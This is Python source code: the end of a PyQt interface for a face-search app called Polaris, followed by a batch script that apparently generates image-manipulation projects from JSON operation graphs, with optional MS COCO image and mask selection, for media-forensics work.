self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
def reload(self):
global path
path = None
self.label_err_face.setText("")
self.popup_icon_err.setStyleSheet("#popup_icon_err{background:transparent;}")
self.shadow_lab_red = QtWidgets.QGraphicsDropShadowEffect()
self.shadow_lab_red.setEnabled(False)
self.lab.setGraphicsEffect(self.shadow_lab_red)
self.lab.setStyleSheet("#card{background-color:rgba(0, 133, 57,0.2);border:1px solid green;border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.lab2.setStyleSheet("#card2{background-color:rgba(0, 124, 133,0.2);border:1px solid rgb(0, 179, 255);border-top-right-radius:10px;border-bottom-left-radius:10px;}")
self.frame_22.setStyleSheet(u"#frame_22{background:transparent}")
self.upload.setGeometry(QtCore.QRect(270, 20, 355, 350))
self.frame2.setGeometry(QtCore.QRect(1030, 370, 231, 231))
self.upload.setStyleSheet("#upload{background:transparent;border-image:url('./src/images/face1.png');}")
self.frame.setStyleSheet(u"#frame{background:transparent}")
self.frame2.setStyleSheet(u"#frame2{background:transparent}")
self.alert_err.setStyleSheet("#alert_err{background:transparent}")
self.shadow_frame2 = QtWidgets.QGraphicsDropShadowEffect(self.frame2,blurRadius=20,xOffset=1,yOffset=1,color=QtGui.QColor(0, 221, 255))
self.frame2.setGraphicsEffect(self.shadow_frame2)
self.lab2_shadow_blue = QtWidgets.QGraphicsDropShadowEffect(self.lab2,blurRadius=60,xOffset=0,yOffset=0,color=QtGui.QColor(0, 70, 99))
self.lab2.setGraphicsEffect(self.lab2_shadow_blue)
self.frame_2.setStyleSheet(u"#frame_2{background:transparent}")
self.frame_err.setStyleSheet("#frame_err{background:transparent}")
self.label.setText("")
self.label2.setText("")
self.label_err.setText("")
self.label_noimg.setText("NO IMAGE")
self.label_noimg2.setText("AVAILABLE")
self.label_noinfo.setText("NO INFORMATIONS")
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("Polaris", "Polaris"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Search for faces"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Add faces"))
|
batch_project.py
|
import json
import networkx as nx
import argparse
import sys
from networkx.readwrite import json_graph
import os
from maskgen import software_loader
from maskgen import scenario_model
import random
from maskgen import tool_set
import shutil
from maskgen import plugins
from maskgen import group_operations
import logging
from threading import Thread, local, currentThread
from maskgen.batch.permutations import *
import time
from maskgen.loghandling import set_logging
from threading import Lock, Thread
from datetime import datetime
import skimage.io as io
import numpy as np
from pycocotools.coco import COCO
import PIL
#set all parameters
dataDir='/dvmm-filer2/users/xuzhang/Medifor/data/MSCOCO/'
dataType='train2014'
annFile='%s/annotations/instances_%s.json'%(dataDir,dataType)
coco=None #COCO(annFile)
imgIds = None #coco.getImgIds()
COCO_flag = False
base_name = None
class IntObject:
value = 0
lock = Lock()
def __init__(self, value=0):
self.value = value
pass
def decrement(self):
with self.lock:
current_value = self.value
self.value -= 1
return current_value
def increment(self):
with self.lock:
self.value += 1
return self.value
def loadJSONGraph(pathname):
with open(pathname, "r") as f:
json_data = {}
try:
json_data = json.load(f, encoding='utf-8')
G = json_graph.node_link_graph(json_data, multigraph=False, directed=True)
except ValueError:
json_data = json.load(f)
G = json_graph.node_link_graph(json_data, multigraph=False, directed=True)
return BatchProject(G,json_data)
return None
def buildIterator(spec_name, param_spec, global_state, random_selection=False):
"""
:param param_spec: argument specification
:param random_selection: produce a continuous stream of random selections
:return: a iterator function to construct an iterator over possible values
"""
if param_spec['type'] == 'list':
if not random_selection:
return ListPermuteGroupElement(spec_name, param_spec['values'])
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: random.choice(param_spec['values'])))
elif 'int' in param_spec['type'] :
v = param_spec['type']
vals = [int(x) for x in v[v.rfind('[') + 1:-1].split(':')]
beg = vals[0] if len (vals) > 0 else 0
end = vals[1] if len(vals) > 1 else beg+1
if not random_selection:
increment = 1
if len(vals) > 2:
increment = vals[2]
return IteratorPermuteGroupElement(spec_name,lambda : xrange(beg, end+1,increment).__iter__())
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: random.randint(beg, end)))
elif 'float' in param_spec['type'] :
v = param_spec['type']
vals = [float(x) for x in v[v.rfind('[') + 1:-1].split(':')]
beg = vals[0] if len(vals) > 0 else 0
end = vals[1] if len(vals) > 1 else beg+1.0
if not random_selection:
increment = 1
if len(vals) > 2:
increment = vals[2]
return IteratorPermuteGroupElement(spec_name,lambda: np.arange(beg, end,increment).__iter__())
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: beg+ random.random()* (end-beg)))
elif param_spec['type'] == 'yesno':
if not random_selection:
return ListPermuteGroupElement(spec_name,['yes','no'])
else:
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: random.choice(['yes', 'no'])))
elif param_spec['type'].startswith('donor'):
mydata = local()
local_state = mydata.current_local_state
choices = [node for node in local_state.getGraph().nodes() \
if len(local_state.getGraph().predecessors(node)) == 0]
if not random_selection:
# do not think we can save this state since it is tied to the local project
return PermuteGroupElement(spec_name,choices.__iter__)
else:
return PermuteGroupElement(spec_name, randomGeneratorFactory(lambda: random.choice(choices)))
return PermuteGroupElement(spec_name,randomGeneratorFactory(lambda: None))
def pickArg(param_spec, node_name, spec_name, global_state, local_state):
"""
:param global_state:
:param name: name of the of iterator (within the group)
:param permutegroup: the name of the permutation group
:param toIteratorFunction: initialize iterator with this function if missing or exhausted
:return:
"""
manager = global_state['permutegroupsmanager']
permutegroup = param_spec['permutegroup'] if 'permutegroup' in param_spec else None
if not manager.has_specification(permutegroup, node_name + '.' + spec_name):
manager.loadParameter(permutegroup,
buildIterator(node_name + '.' + spec_name,param_spec, global_state, random_selection=permutegroup is None))
return manager.current(permutegroup, node_name + '.' + spec_name)
pluginSpecFuncs = {}
def loadCustomFunctions():
import pkg_resources
for p in pkg_resources.iter_entry_points("maskgen_specs"):
logging.getLogger('maskgen').info( 'load spec ' + p.name)
pluginSpecFuncs[p.name] = p.load()
def callPluginSpec(specification, local_state):
if specification['name'] not in pluginSpecFuncs:
raise ValueError("Invalid specification name:" + str(specification['name']))
if 'state_name' in specification:
if specification['state_name'] not in local_state:
local_state[specification['state_name']] = dict()
return pluginSpecFuncs[specification['name']](specification['parameters'],
state=local_state[specification['state_name']])
return pluginSpecFuncs[specification['name']](specification['parameters'])
def executeParamSpec(specification_name, specification, global_state, local_state, node_name, predecessors):
import copy
"""
:param specification:
:param global_state:
:param local_state:
:param predecessors:
:return:
@rtype : tuple(image_wrap.ImageWrapper,str)
@type predecessors: List[str]
"""
if specification['type'] == 'mask':
source = getNodeState(specification['source'], local_state)['node']
target = getNodeState(specification['target'], local_state)['node']
return os.path.join(local_state['model'].get_dir(), local_state['model'].getGraph().get_edge_image(source,
target,
'maskname')[1])
elif specification['type'] == 'value':
return specification['value']
elif specification['type'] == 'variable':
if 'permutegroup' in specification:
source_spec = copy.copy(getNodeState(specification['source'], local_state)[specification['name']])
source_spec['permutegroup'] = specification['permutegroup']
return pickArg(source_spec,node_name,specification_name,global_state, local_state)
else:
return getNodeState(specification['source'], local_state)[specification['name']]
elif specification['type'] == 'donor':
if 'source' in specification:
return getNodeState(specification['source'], local_state)['node']
return random.choice(predecessors)
elif specification['type'] == 'imagefile':
source = getNodeState(specification['source'], local_state)['node']
return local_state['model'].getGraph().get_image(source)[1]
elif specification['type'] == 'input':
return getNodeState(specification['source'], local_state)['output']
elif specification['type'] == 'plugin':
return callPluginSpec(specification,local_state)
return pickArg(specification,node_name, specification_name, global_state, local_state)
def pickArgs(local_state, global_state, node_name, argument_specs, operation,predecessors):
"""
:param local_state:
:param global_state:
:param argument_specs:
:param operation:
:param predecessors:
:return:
@type operation : Operation
@type predecessors: List[str]
"""
startType = local_state['model'].getStartType()
args = {}
if argument_specs is not None:
for spec_param, spec in argument_specs.iteritems():
args[spec_param] = executeParamSpec(spec_param, spec, global_state,local_state, node_name, predecessors)
for param in operation.mandatoryparameters:
if argument_specs is None or param not in argument_specs:
paramDef = operation.mandatoryparameters[param]
if 'source' in paramDef and paramDef['source'] is not None and paramDef['source'] != startType:
continue
v = pickArg(paramDef,node_name, param,global_state,local_state)
if v is None:
raise ValueError('Missing Value for parameter ' + param + ' in ' + operation.name)
args[param] = v
for param in operation.optionalparameters:
if argument_specs is None or param not in argument_specs:
v = pickArg(operation.optionalparameters[param],node_name, param,global_state,local_state)
if v is not None:
args[param] = v
return args
def getNodeState(node_name,local_state):
"""
:param local_state:
:param node_name:
:return:
@type local_state: Dict
@type node_name: str
@rtype: Dict
"""
if node_name in local_state:
my_state = local_state[node_name]
else:
my_state = {}
local_state[node_name] = my_state
return my_state
def working_abs_file(global_state,filename):
return os.path.join(global_state['workdir'] if 'workdir' in global_state else '.',filename)
def pickImageIterator(specification, spec_name, global_state):
if 'picklists' not in global_state:
global_state['picklists'] = dict()
picklist_name = specification['picklist'] if 'picklist' in specification else spec_name
if picklist_name not in global_state['picklists']:
element= FilePermuteGroupElement(spec_name,
specification['image_directory'],
tracking_filename=picklist_name + '.txt')
global_state['picklists'][picklist_name] = element
else:
link_element =global_state['picklists'][picklist_name]
element = LinkedPermuteGroupElement(spec_name,link_element)
return element
def pickImage(node, global_state={}):
with global_state['picklistlock']:
listing = []
if node['picklist'] not in global_state:
if not os.path.exists(node['image_directory']):
raise ValueError("ImageSelection missing valid image_directory: " + node['image_directory'])
#listing = os.listdir(node['image_directory'])
print(node['image_directory'] + '/' + node['picklist'] + '.txt')
if os.path.exists(node['image_directory'] + '/' + node['picklist'] + '.txt'):
with open(node['image_directory'] + '/' + node['picklist'] + '.txt', 'r') as fp:
for line in fp.readlines():
line = line.strip()
listing.append(line)
global_state[node['picklist']] = listing
else:
listing = global_state[node['picklist']]
if len(listing) == 0:
raise ValueError("Picklist of Image Files Empty")
pick = random.choice(listing)
#listing.remove(pick)
#if node['picklist'] not in global_state['picklists_files']:
# global_state['picklists_files'][node['picklist']] = \
# open(node['picklist'] + '.txt', 'a')
#global_state['picklists_files'][node['picklist']].write(pick + '\n')
#global_state['picklists_files'][node['picklist']].flush()
return os.path.join(node['image_directory'], pick)
def pickImage_COCO(node, global_state={}):
with global_state['picklistlock']:
img = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]
print('Base image name: {}'.format(img['file_name']))
return os.path.join(node['image_directory'], img['file_name'])
def pickImage_COCO_with_Mask(node, global_state={}):
with global_state['picklistlock']:
img = coco.loadImgs(imgIds[np.random.randint(0,len(imgIds))])[0]
annIds = coco.getAnnIds(imgIds=img['id'], iscrowd=None)
anns = coco.loadAnns(annIds)
print('Donor image name: {}'.format(img['file_name']))
if len(anns)==0:
tmp_img = PIL.Image.open(os.path.join(node['image_directory'], img['file_name']))
h,w = tmp_img.size
real_mask = np.zeros((w, h), dtype=np.uint8)
real_mask[w/4:3*w/4,h/4:3*h/4] = 1
else:
#try multiple times to find out spliced area that has proper size
num_trial = 0
#number of max trial
max_trial = min(len(anns),5)
while num_trial<max_trial:
real_mask = coco.annToMask(anns[np.random.randint(0,len(anns))])
real_mask = real_mask.astype(np.uint8)
x, y, w, h = tool_set.widthandheight(real_mask)
if w*h>32*32:
break
num_trial = num_trial+1
if num_trial==max_trial:
tmp_img = PIL.Image.open(os.path.join(node['image_directory'], img['file_name']))
h,w = tmp_img.size
real_mask = np.zeros((w, h), dtype=np.uint8)
real_mask[w/4:3*w/4,h/4:3*h/4] = 1
real_mask = (1-real_mask.astype(np.uint8))*255
w, h = real_mask.shape
mask = np.empty((w, h, 3), dtype=np.uint8)
mask[:, :, 0] = real_mask
mask[:, :, 1] = real_mask
mask[:, :, 2] = real_mask
io.imsave('./tests/mask/'+ 'COCO_train2014_02' + '.png', mask)
f = open('./tests/mask/'+ 'classifications' + '.csv', 'w')
f.write('"[0,0,0]",object')
f.close()
return os.path.join(node['image_directory'], img['file_name'])
class BatchOperation:
def execute(self,graph, node_name, node, connect_to_node_name,local_state={},global_state={}):
"""
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
pass
class ImageSelectionOperation(BatchOperation):
def execute(self, graph, node_name, node, connect_to_node_name, local_state={},global_state={}):
"""
Add a image to the graph
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type local_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
# pick image from MSCOCO
if COCO_flag:
pick = pickImage_COCO_with_Mask(node, global_state = global_state)
else:
manager = global_state['permutegroupsmanager']
pick = manager.current( node['permutegroup'] if 'permutegroup' in node else None,
node_name)
logging.getLogger('maskgen').info('Thread {} picking file {}'.format(currentThread().getName(), pick))
getNodeState(node_name,local_state)['node'] = local_state['model'].addImage(pick)
return local_state['model']
class BaseSelectionOperation(BatchOperation):
def execute(self, graph,node_name, node, connect_to_node_name, local_state={},global_state={}):
"""
Add a image to the graph
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
manager = global_state['permutegroupsmanager']
if COCO_flag:
pick = pickImage_COCO(node,global_state =global_state)
else:
pick = pickImage( node,global_state =global_state)
logging.getLogger('maskgen').info('Thread {} picking file {}'.format(currentThread().getName(), pick))
pick_file = os.path.split(pick)[1]
name = pick_file[0:pick_file.rfind('.')]
dir = os.path.join(global_state['projects'],name)
now = datetime.now()
# we should keep all the name stable
timestr = now.strftime("%Y%m%d-%H%M%S-%f")
suffix = '_' + timestr
dir = dir + suffix
name = name + suffix
os.mkdir(dir)
file_path_in_project = os.path.join(dir,pick_file)
shutil.copy2(pick, file_path_in_project)
logging.getLogger('maskgen').info("Thread {} build project {}".format(currentThread().getName(),pick_file))
if COCO_flag:
local_state['model'] = scenario_model.createProject(dir, timestr = now.strftime("%Y%m%d-%H%M%S-%f"), suffixes=tool_set.suffixes)[0]
else:
local_state['model'] = scenario_model.createProject(dir,
name=name,
base=file_path_in_project,
suffixes=tool_set.suffixes)[0]
for prop, val in local_state['project'].iteritems():
local_state['model'].setProjectData(prop, val)
getNodeState(node_name, local_state)['node'] = local_state['model'].getNodeNames()[0]
return local_state['model']
class BaseAttachmentOperation(BatchOperation):
def execute(self, graph,node_name, node, connect_to_node_name, local_state={},global_state={}):
"""
Represent the attachment node, attaching its name to the graph
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
getNodeState(node_name, local_state)['node'] = local_state['start node name']
return local_state['model']
class PluginOperation(BatchOperation):
logger = logging.getLogger('maskgen')
def execute(self, graph, node_name, node,connect_to_node_name, local_state={},global_state={}):
"""
Add a node through an operation.
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
my_state = getNodeState(node_name,local_state)
predecessors = [getNodeState(predecessor, local_state)['node'] \
for predecessor in graph.predecessors(node_name) \
if predecessor != connect_to_node_name and 'node' in getNodeState(predecessor, local_state)]
predecessor_state=getNodeState(connect_to_node_name, local_state)
local_state['model'].selectImage(predecessor_state['node'])
im, filename = local_state['model'].currentImage()
plugin_name = node['plugin']
plugin_op = plugins.getOperation(plugin_name)
if plugin_op is None:
raise ValueError('Invalid plugin name "' + plugin_name + '" with node ' + node_name)
op = software_loader.getOperation(plugin_op['name'],fake=True)
args = pickArgs(local_state,
global_state,
node_name,
node['arguments'] if 'arguments' in node else None,
op,
predecessors)
if 'experiment_id' in node:
args['experiment_id'] = node['experiment_id']
args['skipRules'] = True
args['sendNotifications'] = False
self.logger.debug('Thread {} Execute plugin {} on {} with {}'.format(currentThread().getName(),
plugin_name ,
filename ,
str(args)))
errors, pairs = local_state['model'].imageFromPlugin(plugin_name, **args)
if errors is not None or (type(errors) is list and len (errors) > 0 ):
raise ValueError("Plugin " + plugin_name + " failed:" + str(errors))
my_state['node'] = pairs[0][1]
for predecessor in predecessors:
local_state['model'].selectImage(predecessor)
local_state['model'].connect(my_state['node'],
sendNotifications=False,
skipDonorAnalysis='skip_donor_analysis' in node and node['skip_donor_analysis'])
local_state['model'].selectImage(my_state['node'])
return local_state['model']
class InputMaskPluginOperation(PluginOperation):
logger = logging.getLogger('maskgen')
def execute(self, graph, node_name, node,connect_to_node_name, local_state={},global_state={}):
"""
Add a node through an operation.
:param graph:
:param node_name:
:param node:
:param connect_to_node_name:
:param local_state:
:param global_state:
:return:
@type graph: nx.DiGraph
@type node_name : str
@type node: Dict
@type connect_to_node_name : str
@type global_state: Dict
@type global_state: Dict
@rtype: scenario_model.ImageProjectModel
"""
my_state = getNodeState(node_name,local_state)
predecessors = [getNodeState(predecessor, local_state)['node'] for predecessor in graph.predecessors(node_name) \
if predecessor != connect_to_node_name and 'node' in getNodeState(predecessor, local_state)]
predecessor_state=getNodeState(connect_to_node_name, local_state)
local_state['model'].selectImage(predecessor_state['node'])
im, filename = local_state['model'].currentImage()
plugin_name = node['plugin']
plugin_op = plugins.getOperation(plugin_name)
if plugin_op is None:
raise ValueError('Invalid plugin name "' + plugin_name + '" with node ' + node_name)
op = software_loader.getOperation(plugin_op['name'],fake=True)
args = pickArgs(local_state, global_state,node_name, node['arguments'] if 'arguments' in node else None, op,
predecessors)
args['skipRules'] = True
args['sendNotifications'] = False
targetfile,params = self.imageFromPlugin(plugin_name, im, filename, node_name, local_state, **args)
my_state['output'] = targetfile
if params is not None and type(params) == type({}):
for k, v in params.iteritems():
my_state[k] = v
return local_state['model']
def imageFromPlugin(self, filter, im, filename, node_name, local_state, **kwargs):
import tempfile
"""
@type filter: str
@type im: ImageWrapper
@type filename: str
@rtype: list of (str, list (str,str))
"""
file = os.path.split(filename)[1]
file = file[0:file.rfind('.')]
target = os.path.join(tempfile.gettempdir(), file+ '_' + filter + '.png')
shutil.copy2(filename, target)
params = {}
try:
extra_args, msg = plugins.callPlugin(filter, im, filename, target, **kwargs)
if extra_args is not None and type(extra_args) == type({}):
for k, v in extra_args.iteritems():
if k not in kwargs:
params[k] = v
except Exception as e:
msg = str(e)
raise ValueError("Plugin " + filter + " failed:" + msg)
return target,params
class ImageSelectionPluginOperation(InputMaskPluginOperation):
logger = logging.getLogger('maskgen')
def imageFromPlugin(self, filter, im, filename, node_name, local_state, **kwargs):
import tempfile
"""
@type filter: str
@type im: ImageWrapper
@type filename: str
@rtype: list of (str, list (str,str))
"""
file = os.path.split(filename)[1]
file = file[0:file.rfind('.')]
target = os.path.join(tempfile.gettempdir(), file+ '_' + filter + '.png')
shutil.copy2(filename, target)
params = {}
try:
extra_args, msg = plugins.callPlugin(filter, im, filename, target, **kwargs)
if 'file' not in extra_args:
raise ValueError('file key expected in result to identify chosen file')
else:
pick = extra_args.pop('file')
logging.getLogger('maskgen').info('Thread {} picking file {}'.format(currentThread().getName(), pick))
getNodeState(node_name, local_state)['node'] = local_state['model'].addImage(pick)
if extra_args is not None and type(extra_args) == type({}):
for k, v in extra_args.iteritems():
if k not in kwargs:
params[k] = v
os.remove(target)
except Exception as e:
msg = str(e)
raise ValueError("Plugin " + filter + " failed:" + msg)
return target,params
#<<<<<<< HEAD
#batch_operations = {'BaseSelection': BaseSelectionOperation(),'ImageSelection':ImageSelectionOperation(),
# 'PluginOperation' : PluginOperation(),'InputMaskPluginOperation' : InputMaskPluginOperation()}
#=======
batch_operations = {'BaseSelection': BaseSelectionOperation(),
'ImageSelection':ImageSelectionOperation(),
'ImageSelectionPluginOperation':ImageSelectionPluginOperation(),
'PluginOperation' : PluginOperation(),
'InputMaskPluginOperation' : InputMaskPluginOperation(),
'NodeAttachment': BaseAttachmentOperation()}
#>>>>>>> 34e0c70729949db083ddbc94f0d711b9eb68ed0a
def getOperationGivenDescriptor(descriptor):
"""
:param descriptor:
:return:
@rtype : BatchOperation
"""
return batch_operations[descriptor['op_type']]
def findBaseNodes(graph, node):
predecessors = graph.predecessors(node)
if len(predecessors) == 0:
return [node]
nodes = []
for pred in predecessors:
nodes.extend(findBaseNodes(graph,pred))
return nodes
def findBaseImageNodes(graph,node):
"""
:param graph:
:param node:
:return:
@type graph: nx.DiGraph
"""
return [node for node in findBaseNodes(graph,node) if
graph.node[node]['op_type'] == 'BaseSelection']
class BatchProject:
logger = logging.getLogger('maskgen')
G = nx.DiGraph(name="Empty")
def __init__(self,G,json_data):
"""
:param G:
@type G: nx.DiGraph
"""
self.G = G
self.json_data = json_data
tool_set.setPwdX(tool_set.CustomPwdX(self.G.graph['username']))
def _buildLocalState(self):
local_state = {}
local_state['project'] = {}
for k in self.G.graph:
if k not in ['recompress','name']:
local_state['project'][k] = self.G.graph[k]
return local_state
def getName(self):
return self.G.graph['name'] if 'name' in self.G.graph else 'Untitled'
def executeForProject(self, project, nodes):
recompress = self.G.graph['recompress'] if 'recompress' in self.G.graph else False
global_state = {'picklists_files': {},
'project': self,
'workdir': project.get_dir(),
'count': None,
'permutegroupsmanager': PermuteGroupManager(dir=project.get_dir())
}
local_state = self._buildLocalState()
mydata = local()
mydata.current_local_state = local_state
self.logger.info('Thread {} building project with global state: {} '.format(currentThread().getName(),
str(global_state)))
local_state['model'] = project
base_node = self._findBase()
try:
for node in nodes:
# establish the starting point
local_state['start node name'] = node
completed = []
queue = [base_node]
queue.extend(self.G.successors(base_node))
while len(queue) > 0:
op_node_name = queue.pop(0)
if op_node_name in completed:
continue
predecessors = list(self.G.predecessors(op_node_name))
# skip if a predecessor is missing
if len([pred for pred in predecessors if pred not in completed]) > 0:
continue
connecttonodes = [predecessor for predecessor in self.G.predecessors(op_node_name)
if self.G.node[predecessor]['op_type'] != 'InputMaskPluginOperation']
connect_to_node_name = connecttonodes[0] if len(connecttonodes) > 0 else None
self._execute_node(op_node_name, connect_to_node_name, local_state, global_state)
completed.append(op_node_name)
self.logger.debug('{} Completed: {}'.format(currentThread().getName(), op_node_name))
queue.extend(self.G.successors(op_node_name))
if recompress:
self.logger.debug("Run Save As")
op = group_operations.CopyCompressionAndExifGroupOperation(project)
op.performOp()
local_state['model'].renameFileImages()
if 'archives' in global_state:
project.export(global_state['archives'])
except Exception as e:
project_name = project.getName()
logging.getLogger('maskgen').error('Creation of project {} failed: {}'.format(project_name, str(e)))
return False
return True
def executeOnce(self, global_state=dict()):
#print 'next ' + currentThread().getName()
global_state['permutegroupsmanager'].save()
global_state['permutegroupsmanager'].next()
recompress = self.G.graph['recompress'] if 'recompress' in self.G.graph else False
local_state = self._buildLocalState()
mydata = local()
mydata.current_local_state = local_state
self.logger.info('Thread {} building project with global state: {} '.format(currentThread().getName (),
str(global_state)))
base_node = self._findBase()
try:
self._execute_node(base_node, None, local_state, global_state)
queue = [top for top in self._findTops() if top != base_node]
queue.extend(self.G.successors(base_node))
completed = [base_node]
while len(queue) > 0:
op_node_name = queue.pop(0)
if op_node_name in completed:
continue
predecessors = list(self.G.predecessors(op_node_name))
# skip if a predecessor is missing
if len([pred for pred in predecessors if pred not in completed]) > 0:
continue
connecttonodes = [predecessor for predecessor in self.G.predecessors(op_node_name)
if self.G.node[predecessor]['op_type'] != 'InputMaskPluginOperation']
node = self.G.node[op_node_name]
if len(connecttonodes) > 0 and 'source' in node:
connect_to_node_name = node['source']
else:
connect_to_node_name = connecttonodes[0] if len(connecttonodes) > 0 else None
self._execute_node(op_node_name, connect_to_node_name, local_state, global_state)
completed.append(op_node_name)
self.logger.debug('{} Completed: {}'.format(currentThread().getName (),op_node_name))
queue.extend(self.G.successors(op_node_name))
if recompress:
self.logger.debug("Run Save As")
op = group_operations.CopyCompressionAndExifGroupOperation(local_state['model'])
op.performOp()
local_state['model'].renameFileImages()
if 'archives' in global_state:
local_state['model'].export(global_state['archives'])
except Exception as e:
project_name = local_state['model'].getName() if 'model' in local_state else 'NA'
logging.getLogger('maskgen').error('Creation of project {} failed: {}'.format(project_name, str(e)))
if 'model' in local_state:
shutil.rmtree(local_state['model'].get_dir())
return None
return local_state['model'].get_dir()
def dump(self, global_state):
filename = working_abs_file(global_state,self.getName() + '.png')
self._draw().write_png(filename)
filename = self.getName() + '.csv'
position = 0
with open(filename,'w') as f:
for node in self.json_data['nodes']:
f.write(node['id'] + ',' + str(position) + '\n')
position += 1
colors_bytype ={ 'InputMaskPluginOperation' : 'blue'}
def _draw(self):
import pydot
pydot_nodes = {}
pygraph = pydot.Dot(graph_type='digraph')
for node_id in self.G.nodes():
node = self.G.node[node_id]
name = op_type = node['op_type']
if op_type in ['PluginOperation','InputMaskPluginOperation']:
name = node['plugin']
color = self.colors_bytype[op_type] if op_type in self.colors_bytype else 'black'
pydot_nodes[node_id] = pydot.Node(node_id, label=name,
shape='plain',
color=color)
pygraph.add_node(pydot_nodes[node_id])
for edge_id in self.G.edges():
node = self.G.node[edge_id[0]]
op_type = node['op_type']
color = self.colors_bytype[op_type] if op_type in self.colors_bytype else 'black'
pygraph.add_edge(
pydot.Edge(pydot_nodes[edge_id[0]], pydot_nodes[edge_id[1]], color=color))
return pygraph
def validate(self):
"""
Return list of error strings
:return:
@rtype : List[str]
"""
errors = []
topcount = 0
for top in self._findTops():
top_node = self.G.node[top]
if top_node['op_type'] == 'BaseSelection':
topcount += 1
if topcount > 1:
errors.append("More than one BaseSelection node")
if topcount == 0:
errors.append("Missing one BaseSelection node")
def loadPermuteGroups(self,global_state):
permuteGroupManager = global_state['permutegroupsmanager']
for node_name in self.G.nodes():
node = self.G.node[node_name]
if 'arguments' in node:
for name,spec in node['arguments'].iteritems():
if 'permutegroup' in spec and spec['type'] != 'variable':
permuteGroupManager.loadParameter(spec['permutegroup'],
buildIterator( node_name + '.' + name,spec,global_state))
if 'op_type' in node and node['op_type'] in ['BaseSelection','ImageSelection']:
permutegroup = node['permutegroup'] if 'permutegroup' in node else None
permuteGroupManager.loadParameter(permutegroup,
pickImageIterator(node,
node_name,
global_state))
def _findTops(self):
"""
Find and return top node name
:return:
@rtype: str
"""
return [node for node in self.G.nodes() if len(self.G.predecessors(node)) == 0]
def _findBase(self):
"""
Find and return top node name
:return:
@rtype: str
"""
tops = self._findTops()
for top in tops:
top_node = self.G.node[top]
if top_node['op_type'] in ['BaseSelection' , 'NodeAttachment']:
return top
return None
def _execute_node(self, node_name,connect_to_node_name,local_state, global_state):
"""
:param local_state:
:param global_state:
:return:
@rtype: maskgen.scenario_model.ImageProjectModel
"""
try:
self.logger.debug('_execute_node ' + node_name + ' connect to ' + str (connect_to_node_name))
return getOperationGivenDescriptor(self.G.node[node_name]).execute(self.G, node_name,self.G.node[node_name],\
connect_to_node_name, local_state = local_state, global_state=global_state)
except Exception as e:
logging.getLogger('maskgen').error(str(e))
raise e
def getBatch(jsonFile,loglevel=50):
"""
:param jsonFile:
:return:
@return BatchProject
"""
FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=FORMAT,level=50 if loglevel is None else int(loglevel))
return loadJSONGraph(jsonFile)
threadGlobalState = {}
def thread_worker(**kwargs):
#import copy
global threadGlobalState
globalState = threadGlobalState
count = globalState['count']
permutegroupsmanager = globalState['permutegroupsmanager']
if count is not None:
logging.getLogger('maskgen').info(
'Starting worker thread {}. Current count is {}'.format(currentThread().getName(), count.value))
while ((count and count.decrement() > 0) or (count is None and permutegroupsmanager.hasNext())):
try:
project_directory = globalState['project'].executeOnce(globalState)
if project_directory is not None:
logging.getLogger('maskgen').info( 'Thread {} Completed {}'.format(currentThread().getName (),
project_directory))
else:
logging.getLogger('maskgen').error(
'Exiting thread {} due to failure to create project'.format(currentThread().getName()))
break
except Exception as e:
logging.getLogger('maskgen').info('Completed thread: ' + str(e))
def main():
global threadGlobalState
parser = argparse.ArgumentParser()
parser.add_argument('--json', required=True, help='JSON File')
parser.add_argument('--count', required=False, help='number of projects to build')
parser.add_argument('--threads', required=False, help='number of projects to build')
parser.add_argument('--workdir',required=False,help='directory to maintain and look for lock list, logging and permutation files')
parser.add_argument('--results', required=True, help='project results directory')
parser.add_argument('--loglevel', required=False, help='log level')
parser.add_argument('--graph', required=False, action='store_true',help='create graph PNG file')
parser.add_argument('--COCO_flag', required=False, action='store_true', help='whether to use COCO dataset.')
parser.add_argument("--COCO_Dir", nargs='?', type=str, default = '/dvmm-filer2/users/xuzhang/Medifor/data/MSCOCO/'
,help="Directory of MS COCO dataset.")
args = parser.parse_args()
if not os.path.exists(args.results) or not os.path.isdir(args.results):
logging.getLogger('maskgen').error( 'invalid directory for results: ' + args.results)
return
loadCustomFunctions()
batchProject =getBatch(args.json, loglevel=args.loglevel)
picklists_files = {}
workdir = '.' if args.workdir is None or not os.path.exists(args.workdir) else args.workdir
set_logging(workdir)
threadGlobalState = {'projects': args.results,
'picklists_files': picklists_files,
'project': batchProject,
'workdir': workdir,
'count': IntObject(int(args.count )) if args.count else None,
'permutegroupsmanager' : PermuteGroupManager(dir=workdir),
'picklistlock' : Lock()
}
